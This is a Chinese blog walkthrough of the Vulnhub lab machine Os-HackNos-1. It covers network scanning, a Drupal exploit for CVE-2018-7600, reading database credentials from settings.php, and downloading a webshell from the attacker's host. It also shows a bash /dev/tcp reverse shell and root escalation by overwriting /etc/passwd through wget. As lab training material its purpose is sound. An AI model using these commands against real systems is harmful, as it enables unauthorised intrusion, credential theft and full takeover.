【Vulnhub】靶机OS-HACKNOS

| | | | 952

前言

  • 第一次玩Vulnhub,只记录使用命令和一些感想,还有踩坑记录

Os-HackNos-1配置

首先介绍一下靶机,靶机是 vulnhub Os-hackNos-1

简介: 难度容易到中, flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt

靶机的地址:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/

有的靶机可能打开无法获取IP,我们需要使用方法来进入到靶机内,修改信息。

1、导入到了虚拟机之后,会出现无法获取ip的情况,我们自己调,开启HackNos的同时连按shift键,按e进入页面

image-20210919160755067

3、将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入root操作页面

image-20210919160925088

4、查ip a发现查不到,记住网卡的名称ens33,准备修改配置信息

image-20210919161030226

5、vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡,把这两个都改成 ens33

image-20210919161105212

6、然后/etc/init.d/networking restart 重启网卡服务 enp0s3

image-20210919161139706

7、最后按ctrl+alt+del,进行重启,就ok了

Os-HackNos-1开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、扫目录情况

1
2
3
gobuster dir -u http://192.168.1.108/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

dirb http://10.0.2.4

4、根据下载drupal的cms来试着看其版本

1
http://192.168.1.108/drupal/CHANGELOG.txt

5、通过cms版本搜一下exp

1
2
CVE-2018-7600
git clone https://github.com/pimps/CVE-2018-7600

6、有一个远程REC利用exp拿下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ 
查看数据库
python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "cd sites/default;ls;cat settings.php"


获得
* Database configuration format:
 * @code
 *   $databases['default']['default'] = array(
 *     'driver' => 'mysql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *   );
 *   $databases['default']['default'] = array(
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *   );
 * @endcode
 */
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'cuppa',
      'username' => 'cuppauser',
      'password' => 'Akrn@4514',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

也可以对其目录进行扫描

1
2
3
gobuster dir -u http://192.168.1.108/drupal -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

dirsearch -u 192.168.1.108 -e*  -x 403

7、利用python搭建服务器,让其下载木马,就可以上线webshell了

1
2
3
python -m SimpleHTTPServer 

python3 drupa7-CVE-2018-7600.py http://192.168.1.108/drupal/ -c "wget http://192.168.1.105:8000/gylq.php"

8、反弹shell

1
bash -c 'exec bash -i &>/dev/tcp/192.168.1.105/6666 0>&1'

9、解密得出james:Hacker@451

1
2
echo "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d
<T4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==" | base64 -d

10、suid提权

利用制作一个ssl密码

1
2
3
openssl passwd -1 -salt gylq 123456
输出
$1$gylq$/LTjhHmiHp0tpo66ocv2e/

将其更改为下列形式,用wget替换

1
gylq:$1$gylq$/LTjhHmiHp0tpo66ocv2e/:0:0:root:/root:/bin/bash
1
wget http://192.168.1.105:8000/passwd -O /etc/passwd

接着用su gylq来登陆就是root权限了

我的个人博客

孤桜懶契:http://gylq.gitee.io

本文标题:【Vulnhub】靶机OS-HACKNOS

文章作者:孤桜懶契

发布时间:2021年09月19日 - 16:03:55

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/145.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------
欢迎光临
❤️
孤桜懶契
请多关照
❤️
❤️